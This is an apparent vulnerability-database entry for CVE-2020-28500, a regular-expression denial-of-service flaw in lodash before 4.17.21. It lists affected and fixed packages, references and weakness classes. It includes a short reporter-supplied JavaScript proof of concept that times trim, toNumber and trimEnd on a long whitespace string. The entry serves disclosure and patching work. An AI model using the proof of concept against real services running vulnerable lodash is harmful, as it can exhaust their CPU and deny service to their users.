Django REST framework

Vulnerability Instance

Lookup for vulnerabilities affecting packages.

Vulnerability_idVCID-aecq-1mad-n7h1
Summary
Regular Expression Denial of Service (ReDoS) in lodash
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions.

Steps to reproduce (provided by reporter Liyuan Chen):
```js
var lo = require('lodash');

function build_blank(n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var s = build_blank(50000) var time0 = Date.now();
lo.trim(s)
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);
var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
```
Aliases
0
alias CVE-2020-28500
1
alias GHSA-29mw-wpgm-hmr9
Fixed_packages
0
url pkg:gem/lodash-rails@4.17.21
purl pkg:gem/lodash-rails@4.17.21
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/lodash-rails@4.17.21
1
url pkg:npm/lodash@4.17.21
purl pkg:npm/lodash@4.17.21
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/lodash@4.17.21
2
url pkg:npm/lodash-es@4.17.21
purl pkg:npm/lodash-es@4.17.21
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/lodash-es@4.17.21
Affected_packages
0
url pkg:gem/lodash-rails@4.0.0
purl pkg:gem/lodash-rails@4.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aecq-1mad-n7h1
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/lodash-rails@4.0.0
1
url pkg:npm/lodash@4.0.0
purl pkg:npm/lodash@4.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4up5-csax-tuax
1
vulnerability VCID-aecq-1mad-n7h1
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/lodash@4.0.0
2
url pkg:npm/lodash-es@4.0.0
purl pkg:npm/lodash-es@4.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4up5-csax-tuax
1
vulnerability VCID-aecq-1mad-n7h1
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/lodash-es@4.0.0
3
url pkg:npm/lodash.trim@4.0.0
purl pkg:npm/lodash.trim@4.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aecq-1mad-n7h1
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/lodash.trim@4.0.0
4
url pkg:npm/lodash.trim@4.5.1
purl pkg:npm/lodash.trim@4.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aecq-1mad-n7h1
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/lodash.trim@4.5.1
5
url pkg:npm/lodash.trimend@4.0.0
purl pkg:npm/lodash.trimend@4.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aecq-1mad-n7h1
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/lodash.trimend@4.0.0
6
url pkg:npm/lodash.trimend@4.5.1
purl pkg:npm/lodash.trimend@4.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aecq-1mad-n7h1
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/lodash.trimend@4.5.1
References
0
reference_url https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
reference_id
reference_type
scores
url https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
1
reference_url https://github.com/github/advisory-database/pull/6139
reference_id
reference_type
scores
url https://github.com/github/advisory-database/pull/6139
2
reference_url https://github.com/lodash/lodash
reference_id
reference_type
scores
url https://github.com/lodash/lodash
3
reference_url https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8
reference_id
reference_type
scores
url https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8
4
reference_url https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
reference_id
reference_type
scores
url https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
5
reference_url https://github.com/lodash/lodash/pull/5065
reference_id
reference_type
scores
url https://github.com/lodash/lodash/pull/5065
6
reference_url https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
reference_id
reference_type
scores
url https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
7
reference_url https://security.netapp.com/advisory/ntap-20210312-0006
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20210312-0006
8
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
reference_id
reference_type
scores
url https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
9
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
reference_id
reference_type
scores
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
10
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
reference_id
reference_type
scores
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
11
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
reference_id
reference_type
scores
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
12
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
reference_id
reference_type
scores
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
13
reference_url https://snyk.io/vuln/SNYK-JS-LODASH-1018905
reference_id
reference_type
scores
url https://snyk.io/vuln/SNYK-JS-LODASH-1018905
14
reference_url https://www.oracle.com/security-alerts/cpujan2022.html
reference_id
reference_type
scores
url https://www.oracle.com/security-alerts/cpujan2022.html
15
reference_url https://www.oracle.com//security-alerts/cpujul2021.html
reference_id
reference_type
scores
url https://www.oracle.com//security-alerts/cpujul2021.html
16
reference_url https://www.oracle.com/security-alerts/cpujul2022.html
reference_id
reference_type
scores
url https://www.oracle.com/security-alerts/cpujul2022.html
17
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
url https://www.oracle.com/security-alerts/cpuoct2021.html
18
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-28500
reference_id CVE-2020-28500
reference_type
scores
url https://nvd.nist.gov/vuln/detail/CVE-2020-28500
19
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml
reference_id CVE-2020-28500.YML
reference_type
scores
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml
20
reference_url https://github.com/advisories/GHSA-29mw-wpgm-hmr9
reference_id GHSA-29mw-wpgm-hmr9
reference_type
scores
url https://github.com/advisories/GHSA-29mw-wpgm-hmr9
Weaknesses
0
cwe_id 1333
name Inefficient Regular Expression Complexity
description The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles.
1
cwe_id 400
name Uncontrolled Resource Consumption
description The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.
2
cwe_id 937
name OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013.
3
cwe_id 1035
name OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.
Exploits
Severity_range_scorenull
Exploitabilitynull
Weighted_severitynull
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/vulnerabilities/VCID-aecq-1mad-n7h1